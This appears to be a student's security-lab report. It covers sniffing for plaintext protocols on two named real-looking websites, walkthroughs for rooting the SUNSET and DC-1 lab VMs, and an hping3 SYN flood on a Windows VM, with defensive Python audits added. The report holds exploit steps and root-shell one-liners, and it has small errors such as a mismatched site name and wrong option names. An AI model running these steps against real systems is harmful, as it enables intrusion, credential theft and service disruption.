ASSIGNMENT-4
Objective: The objective of Task 4 is to enhance practical understanding and skills in
network security and penetration testing through three key activities: sniffing vulnerable
protocols, server hacking, and performing a Denial of Service (DoS) attack. The goal is to
identify websites using insecure protocols (HTTP, FTP, POP) to demonstrate the risks
associated with unencrypted data transmission, exploit vulnerabilities in target servers to
uncover hidden flags and reinforce the importance of securing server configurations, and
execute a DoS attack to understand its impact on system performance and the necessity of
robust defensive measures. These tasks aim to provide hands-on experience with real-world
cybersecurity threats and defenses.
A. Sniffing – Identify the websites that have vulnerable protocols to
sniff.
Sniffing:- Sniffing refers to the process of monitoring and capturing data packets as
they travel across a network. This can be done using software tools known as packet
sniffers or network analyzers. Sniffing is often used by network administrators for
monitoring and troubleshooting network traffic, ensuring security and analyzing
performance.
Wireshark:- Wireshark is a widely-used network protocol analyzer that allows users to
capture and interactively browse the traffic running on a computer network. It
provides detailed information about network packets, making it an essential tool for
network troubleshooting, analysis, software and protocol development and education.
➢ HTTP: It is a foundational protocol used for transmitting data over the web. It
defines how messages are formatted and transmitted, and how web servers and
browsers should respond to various commands. HTTP operates primarily at the
application layer, supporting methods like GET and POST to retrieve and send data
respectively.
Site:- olasms.in
➢ FTP: FTP is a standard network protocol used to transfer files from one host to
another over a TCP-based network such as the internet. It operates on a client-server
model where the client initiates a connection to the server to upload or download
files.
Site:- enic.pk
➢ POP: POP (Post Office Protocol) is used by email clients to retrieve messages from a
mail server. Its early versions were fundamental in the development of email
communication but have since been replaced by more advanced versions, most notably
POP3.
Site:- enic.pk
Conclusion:- In this task, the websites enric.pk and olasms.in were analyzed for their use of
insecure protocols such as POP, FTP and HTTP. Using tools like Wireshark, it was found that
these websites transmitted sensitive information in plaintext. This highlighted the significant
risks associated with unencrypted data transmission and underscored the necessity of
adopting secure protocols like HTTPS and FTPS to ensure data protection.
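Added example (not part of the original assignment): a short Python audit that shows what a capture of FTP, POP3 or HTTP traffic exposes, listing each cleartext credential field with its value redacted. The sample segments, host name and passwords are constructed for illustration.

```python
import base64
import re

# Cleartext services named in this task, keyed by standard server port.
PLAINTEXT_PORTS = {21: "FTP", 80: "HTTP", 110: "POP3"}
LOGIN_CMD = re.compile(rb"^(USER|PASS)\s+(\S+)", re.I)  # FTP and POP3 logins
BASIC_AUTH = re.compile(rb"^Authorization:\s*Basic\s+(\S+)", re.I)
FORM_SECRET = re.compile(rb"(?:^|[?&])(pass(?:word)?|pwd)=([^&\s]+)", re.I)


def redact(value: bytes) -> str:
    """Report only the length so the audit never repeats the secret."""
    return f"<{len(value)} bytes redacted>"


def audit_segment(dst_port: int, payload: bytes) -> list:
    """Return (protocol, field, redacted value) per credential sent in clear."""
    proto = PLAINTEXT_PORTS.get(dst_port)
    if proto is None:
        return []  # not one of the plaintext services
    findings = []
    for line in payload.splitlines():
        if proto in ("FTP", "POP3"):
            m = LOGIN_CMD.match(line)
            if m:
                findings.append((proto, m.group(1).decode().upper(), redact(m.group(2))))
            continue
        m = BASIC_AUTH.match(line)
        if m:
            try:  # Basic auth is only base64, not encryption
                secret = base64.b64decode(m.group(1), validate=True)
                findings.append((proto, "basic-auth", redact(secret)))
            except ValueError:
                pass  # malformed header: nothing decodable to report
        for fm in FORM_SECRET.finditer(line):
            findings.append((proto, "form:" + fm.group(1).decode().lower(), redact(fm.group(2))))
    return findings


# Constructed sample segments (destination port, TCP payload), not real captures.
SAMPLE = [
    (21, b"USER demo\r\nPASS example-ftp-pw\r\n"),
    (110, b"USER demo\r\nPASS example-pop-pw\r\n"),
    (80, b"POST /login HTTP/1.1\r\nHost: lab.example\r\n\r\nuser=demo&password=example-web-pw"),
    (443, b"\x16\x03\x01\x02\x00"),  # TLS record on 443: nothing readable
]

if __name__ == "__main__":
    for port, data in SAMPLE:
        print(port, audit_segment(port, data))
```

Every finding is a field that anyone on the network path can read; the TLS segment yields none, which is the case for moving these logins to HTTPS, FTPS and POP3 over TLS.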
B. Server Hacking – Crack the servers and find the flags
➢ Exploit the SUNSET server
1. Open supraja downloads folder
2. Open server hacking folder and extract it
3. Double click on the SUNSET ova
4. It opens VirtualBox and a popup appears; click on Import
5. Check whether SUNSET is on the NAT network or not
6. Click on power on this machine
7. Start Parrot OS also
8. We need to find the IP address of the SUNSET server
Command:- sudo netdiscover
9. Now we have found the IP address of the SUNSET server
IP:- 10.0.2.15
10. We need to find the open ports and OS by using nmap
Command: nmap -A 10.0.2.15
11. Now we have found a vulnerability known as ftp-anon
Command: ftp 10.0.2.15
Username: Anonymous
Password:
12. We are inside the SUNSET server; now we need to find the flag.
13. We can see a backup file, so we download that file to our Parrot OS machine
Command: ls
Command: get backup
14. Now we have the backup file in Parrot OS.
15. Now look at the content inside the backup file
Command: cat backup
16. Now take the sunset hash value and save it in a notepad (or) pluma
Command: pluma hash
17. Now we need to crack the hash by using John the Ripper
Command: john hash
18. Now we are going to see the plain password
Command: john hash --show
19. Now we are going to connect by using ssh. We now know the password
Command: ssh sunset@10.0.2.15
Password: cheer14
20. Now we look at what is inside, so we use ls
Command: ls
We have a user file inside it, so we are going to see the content.
Command: cat user
21. We have found the first flag. Now we are going to find the second flag, where we need to be
the root user.
Command: sudo -l
Command: sudo /usr/bin/ed
Command: ! /bin/sh
Command: cd /root
Command: ls
Command: cat flag.txt
22. Now we have found all the flags in the SUNSET server.
➢ Exploit the DC-1 server
1. Open supraja downloads folder
2. Open server hacking folder and extract it
3. Double click on the DC-1 ova
4. It opens VMware and a popup appears; click on Import
5. Check whether the DC-1 is in NAT network or not
6. Start DC-1 server
7. We don’t know the credentials of the server.
8. Start Kali Linux also
9. Give the credentials of Kali Linux
10. Now Kali Linux will be the attacker machine, and the server will be the victim
machine.
11. First we need to find the IP address of the server machine, so we are going to use nmap
Command:- sudo nmap -T4 -sn 192.168.10.0/24
12. The IP address of the server is 192.168.10.136
13. Open any browser and paste the IP in the search bar
14. Now do an intense scan on the IP address so we can find any vulnerabilities
Command: sudo nmap -A -O -T4 192.168.10.136
15. Use nmap scripts for enumeration of the open ports for HTTP and SSH
Path for nmap scripts:- /usr/share/nmap/scripts/
Command:- sudo nmap -p 80,443 --script ssh-brute.nse 192.168.10.136
In the same way, we need to run the enumeration scripts against all the open ports.
16. Enumeration did not reveal any flags or a way to crack the server, so we are
going to use “msfconsole” from the Metasploit Framework.
Command:- msfconsole
17. After fully understanding the outputs of nmap, we have found a vulnerability
through which we can get into the victim system. To search for the exploit we
use msfconsole.
18. The vulnerable component on the victim machine is Drupal, which can give a remote
connection to the server. To find the exploit we use a command called
search.
Command: search drupal
19. We are going to use one exploit so that we can get a remote command connection to
the server.
Command: use 0
20. Now the payload is ready. Next we need to enter the victim machine IP address
and details; to see what is required we use a command called show options.
Command: show options
21. Now we are going to set RHOST and TARGETURI so that the payload knows
where to attack.
Command: set RHOSTS 192.168.10.136
Command: set TARGETURL 192.168.10.136
22. We have given all the details it requires; now we are going to exploit the victim
server by giving a command.
Command:- exploit
23. After that a session will open where we will be in the victim machine.
24. Now we are going to find the flags.
25. We use the same commands as in Kali Linux.
26. Now we are going to look at www inside /var.
27. In this folder we have found the first flag, flag1.txt
Path: /var/www
28. We are going to look for clues for flag2.txt by reading flag1.txt.
Command: cat flag1.txt
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
29. Now we are going to find the config file, which is settings.php. We are
going to use the cat command to read settings.php
Path:- /var/www/sites/default/settings.php
Command:- cat settings.php
30. We have found flag 2 in settings.php. Now we need to find flag3
31. Couldn’t find flag three
32. flag4 is in home
Path:- home/flag4/flag4.txt
Command:- cd flag4
Command:- cat flag4.txt
33. Now we need to do privilege escalation to get the final flag
Path:- /tmp
Command:- touch DC-1
For privilege escalation
Command: find DC-1 -exec "/bin/sh" \;
34. After privilege escalation go to root
Command: cd /root
Command: ls
Command: cat thefinalflag.txt
So finally we found the final flag in the server.
Conclusion: In this task, we exploited vulnerabilities in the SUNSET and DC-1 servers to
uncover hidden flags. Parrot OS was used for the SUNSET server and FTP exploits,
employing John the Ripper for password cracking. For the DC-1 server, Kali Linux was used,
leveraging “msfconsole” to identify and exploit vulnerabilities. Both servers were
successfully compromised, demonstrating the effectiveness of penetration testing techniques
and underscoring the importance of regular security assessments and timely patch
management to secure server environments.
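Added example (not part of the original assignment): a Python check for the two misconfigurations behind the root steps above, a sudo rule for ed on SUNSET and the find -exec step on DC-1. It assumes find is setuid root on DC-1, which the write-up does not state, and the sudo -l and setuid listings are constructed samples, since neither output is shown here.

```python
import re

# Programs that can start a shell from inside themselves. ed and find are the
# two used in this task; the others are added here as the same class of tool.
SHELL_CAPABLE = {"ed", "find", "vi", "vim", "less", "more", "awk", "man"}


def basename(path: str) -> str:
    return path.rstrip("/").rsplit("/", 1)[-1]


def risky_sudo_rules(sudo_l_output: str) -> list:
    """Commands listed by `sudo -l` that hand the caller a root shell."""
    risky = []
    for line in sudo_l_output.splitlines():
        # Rule lines look like "    (root) NOPASSWD: /usr/bin/ed, /bin/ls"
        m = re.match(r"\s*\([^)]*\)\s*(?:[A-Z]+:\s*)*(.+)", line)
        if not m:
            continue
        for cmd in (c.strip() for c in m.group(1).split(",")):
            if cmd and (cmd == "ALL" or basename(cmd.split()[0]) in SHELL_CAPABLE):
                risky.append(cmd)
    return risky


def risky_suid(paths_output: str) -> list:
    """Setuid paths (one per line, e.g. from `find / -perm -4000 -type f`)
    whose program can run a shell with the file owner's privileges."""
    return [p for p in paths_output.splitlines() if p and basename(p) in SHELL_CAPABLE]


# Constructed inputs modelled on the two lab machines; not copied from them.
SUDO_L_SAMPLE = """User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
    (root) /usr/bin/uptime
"""
SUID_SAMPLE = "/usr/bin/passwd\n/usr/bin/find\n/bin/mount\n"

if __name__ == "__main__":
    print("sudo rules to remove or restrict:", risky_sudo_rules(SUDO_L_SAMPLE))
    print("setuid bits to clear:", risky_suid(SUID_SAMPLE))
```

Anything the check reports should be removed from sudoers or have its setuid bit cleared unless there is a documented need for it.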
C. Perform a DoS attack on Windows 10 Virtual Machine and check
the performance.
Now we are going to perform a DoS attack on a Windows 10 virtual machine by using Kali
Linux, where the victim machine is Windows and the attacker machine is Kali Linux.
To do the DoS attack we are going to use hping3.
1. We need to find the IP address of the Windows 10 machine
Command: sudo netdiscover
2. Now we have the IP address of the machine, 192.168.10.133. Next we find
the open ports for the DoS attack; to find the ports we use nmap
Command: nmap -T4 -A 192.168.10.133
3. Now we are going to do the attack by using hping3
Command: sudo hping3 -S --flood -V -p 80 192.168.10.133
4. Now we are going to see the packets that are sent to Windows by using Wireshark
5. Check the performance in Windows Task Manager.
This is how a DoS attack happens in real life as well. To prevent it we must use
firewalls and similar defenses.
Conclusion: In this task, a Denial of Service (DoS) attack was performed on a Windows
10 virtual machine from a Kali Linux machine using the ‘hping3’ tool. A SYN flood attack
was executed, significantly degrading the performance of the target system. This exercise
illustrated the destructive potential of DoS attacks and highlighted the critical need for
robust network defense mechanisms, such as firewalls and intrusion detection systems, to
mitigate such threats.
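Added example (not part of the original assignment): the detection side of this task in Python, flagging a destination port that receives many SYNs in one window while almost none of the handshakes complete. The packet records, the client and source addresses, and the thresholds are constructed assumptions; only the target 192.168.10.133 and port 80 come from the steps above.

```python
from collections import defaultdict


def detect_syn_flood(packets, window=1.0, min_syns=200, max_completed=0.1):
    """Flag (dst, port, window) buckets with many SYNs and few finished handshakes.

    packets: iterable of (ts, src, sport, dst, dport, flags), where flags is
    "S" for a bare SYN and "A" for the client's handshake-completing ACK.
    """
    syn_flows = defaultdict(set)   # bucket -> flows that opened with a SYN
    opened_in = {}                 # flow -> bucket where its SYN was seen
    completed = defaultdict(int)   # bucket -> flows that went on to ACK
    for ts, src, sport, dst, dport, flags in packets:
        flow = (src, sport, dst, dport)
        if flags == "S":
            bucket = (dst, dport, int(ts // window))
            syn_flows[bucket].add(flow)
            opened_in[flow] = bucket
        elif flags == "A" and flow in opened_in:
            completed[opened_in.pop(flow)] += 1
    alerts = []
    for bucket in sorted(syn_flows):
        syns = len(syn_flows[bucket])
        ratio = completed[bucket] / syns
        if syns >= min_syns and ratio <= max_completed:
            dst, dport, idx = bucket
            alerts.append({"dst": dst, "dport": dport, "start": idx * window,
                           "syns": syns, "completed_ratio": round(ratio, 3)})
    return alerts


def sample_packets():
    """Constructed traffic: five normal clients, then a one-second SYN burst."""
    target, port = "192.168.10.133", 80       # victim address and port from this task
    pkts = []
    for i in range(5):                         # normal clients finish the handshake
        client = ("192.168.10.%d" % (20 + i), 40000 + i, target, port)
        pkts.append((5.0 + i * 0.1, *client, "S"))
        pkts.append((5.02 + i * 0.1, *client, "A"))
    for i in range(500):                       # flood: SYNs only, never an ACK
        pkts.append((10.0 + i * 0.001, "192.168.10.50", 1024 + i, target, port, "S"))
    return pkts


if __name__ == "__main__":
    print(detect_syn_flood(sample_packets()))
```

The completion ratio is what separates a flood from a busy but healthy server: the normal clients in the sample open connections too, but every one of them finishes the handshake.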
Summary: Assignment 4 focused on enhancing practical cybersecurity skills through
three key tasks. In Task 4A, Wireshark was used to sniff vulnerable protocols
(POP, FTP, HTTP) on websites enric.pk and olasms.in, highlighting the risks of
unencrypted data transmission. Task 4B involved exploiting the SUNSET and DC-1
servers using Parrot OS and Kali Linux, respectively, with tools like John the Ripper and
msfconsole to uncover hidden flags, demonstrating effective penetration testing
techniques. Task 4C executed a Denial of Service (DoS) attack on a Windows 10 VM from
Kali Linux using ‘hping3’, illustrating the impact of SYN flood attacks and the
importance of robust network defenses. Overall, the assignment underscored the necessity
of secure protocols, regular security assessments, and strong defensive measures to
protect digital assets.